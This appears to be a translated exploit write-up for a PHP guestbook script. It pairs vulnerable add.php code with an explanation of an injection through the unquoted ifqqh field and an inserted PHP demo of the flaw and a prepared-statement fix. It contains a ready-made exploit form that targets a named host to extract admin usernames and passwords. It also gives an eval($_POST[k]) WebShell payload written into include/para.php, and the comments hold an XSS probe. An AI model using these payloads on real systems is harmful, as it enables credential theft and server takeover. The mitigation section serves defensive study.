By: 毅心毅意

    Download: http://down.chinaz.com/soft/29982.htm

add.php:

<?php
if($_POST['unum']==$_SESSION["randValid"]){
    $username=addslashes(htmlspecialchars($_POST['username']));
    $email=addslashes(htmlspecialchars($_POST['email']));
    $content=addslashes(htmlspecialchars($_POST['content']));
    $userip=$_SERVER["REMOTE_ADDR"];
    $ifqqh=$_POST["ifqqh"];
    if(empty($ifqqh)) $ifqqh=0;
    $systime=date("Y-m-d H:i:s");
    if(!empty($content) or !empty($username)){
        $ifshow="";
        // restore spaces and line breaks
        if(!empty($content)){
            $content=str_replace(" ","",$content);
            $content=ereg_replace("\n","<br>  ",ereg_replace(" ","&nbsp;",$content));
        }
        if($ifauditing==1){$ifshow=0;}else{$ifshow=1;}
        // end of restore
        $sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";
        //echo $sql;



$ifqqh=$_POST["ifqqh"]; is taken from the request with no filtering at all.
In the statement $sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")"; the value of $ifqqh is concatenated into a numeric position without being wrapped in ' , so it is not affected by magic_quotes_gpc.
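The point above, as an added example rather than the guestbook's own code: ifqqh lands in a numeric column, so addslashes() (what magic_quotes_gpc performs) has nothing to escape, while validating the flag and binding it through a prepared statement closes the hole. The function names, the two-column guestbook table and the payload are constructed for the demonstration; PDO with the sqlite driver is assumed.

```php
<?php
// Added example, not the guestbook project's code: demonstrates why
// addslashes() / magic_quotes_gpc cannot protect the unquoted ifqqh
// column, and a hardened insert. Assumes PDO with the sqlite driver.
declare(strict_types=1);

// The write-up's construction reduced to the ifqqh parameter: addslashes()
// is applied the way magic_quotes_gpc would, then the value is concatenated
// into a numeric position with no surrounding quotes.
function build_sql_vulnerable(string $ifqqh): string {
    $ifqqh = addslashes($ifqqh);
    return "insert into guestbook(username,ifqqh) values('a'," . $ifqqh . ")";
}

// Hardened: ifqqh is a 0/1 flag, so reject anything else before it reaches
// SQL (anything unset or invalid falls back to 0, the public-entry default).
function validate_ifqqh($raw): int {
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 1]]);
    return $v === false ? 0 : $v;
}

// ... and bind it as an integer parameter instead of string concatenation.
function insert_entry(PDO $db, string $username, $rawIfqqh): int {
    $stmt = $db->prepare('INSERT INTO guestbook(username, ifqqh) VALUES (:u, :q)');
    $stmt->bindValue(':u', $username, PDO::PARAM_STR);
    $stmt->bindValue(':q', validate_ifqqh($rawIfqqh), PDO::PARAM_INT);
    $stmt->execute();
    return (int) $db->lastInsertId();
}

// Constructed injection string in the shape the write-up describes: it closes
// the VALUES tuple and appends a second row. It contains no quote character,
// so addslashes() hands it back unchanged.
$payload = "0),('x',1";
assert(addslashes($payload) === $payload);
echo build_sql_vulnerable($payload), "\n";   // two rows would be inserted

$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE guestbook(id INTEGER PRIMARY KEY, username TEXT, ifqqh INTEGER)');
insert_entry($db, 'visitor', $payload);      // payload rejected, stored as 0
insert_entry($db, 'visitor', '1');           // legitimate private-message flag
$rows = $db->query('SELECT username, ifqqh FROM guestbook')->fetchAll(PDO::FETCH_ASSOC);
echo count($rows), " rows\n";                // exactly the two we inserted
print_r($rows);
```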

Exp:

<form name="form1" method="post" action="http://guestboo.ibook.bz/add.php" onSubmit="return FrontPage_Form1_Validator(this)">
<p><img src="images/i1.gif" /><img src="images/add.gif" /></p><br />
<label for="user">昵称:</label><input type="text" id="username" name="username" value="123312" />*<br />
<label for="email">Email:</label><input type="text" id="email" name="email" value="" /><br />
<label for="comment">内容:</label><textarea id=content name="content"></textarea>*<br />
<label for="comment"> </label><span>提交前请按Ctrl+C保存留言内容,以免程序出错而丢失!
留言内容不能少于5个字符!</span><br />
<input type="text" id="ifqqh" name="ifqqh" value="6666666),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0" /><br />
<label for="email">悄悄话:</label>
<input name="ifqqh" type="checkbox" id="ifqqh" value="1"> <span>当选中时,此留言只有管理员可见</span><br />
<label for="umum">验证码:</label><input name="unum" type="text" id="unum" size="10">* <img src="http://guestboo.ibook.bz/include/randnum.php?id=-1" title="点击刷新" style="cursor:pointer" onclick=eval('this.src="include/randnum.php?id='+i+++'"')>
<br />
<input type="submit" id="sbutton" value="确  定" /><br /><input name="ac" type="hidden" id="ac" value="add">
</form>

    Log in to the admin backend.

迅捷网络留言本 (formerly 多多留言本) v1.1: GBK injection vulnerability and obtaining a WebShell via the admin backend

admin_set.php:

// write the para file
$filenum = fopen ("include/para.php","w");
ftruncate($filenum, 0);
fwrite($filenum, $parafile);
fclose($filenum);
echo "设置已保存,请稍候……<br><a href=".$pageUrl.">如果浏览器没有自动返回,请点击此处返回</a>";
echo "<meta http-equiv=\"refresh\" content=\"2; url=".$pageUrl."\">";
?>

    The settings are written to include/para.php, so submitting 44';eval($_POST[k]); as a setting value is enough.


    Because the value is wrapped in ' here, this one is affected by magic_quotes_gpc.

Comments (legacy system):

Anonymous @ 2013-03-28 20:00:36

a.jsp/scriptalert(Vulnerable)/script

Site reply:

╮(╯_╰)╭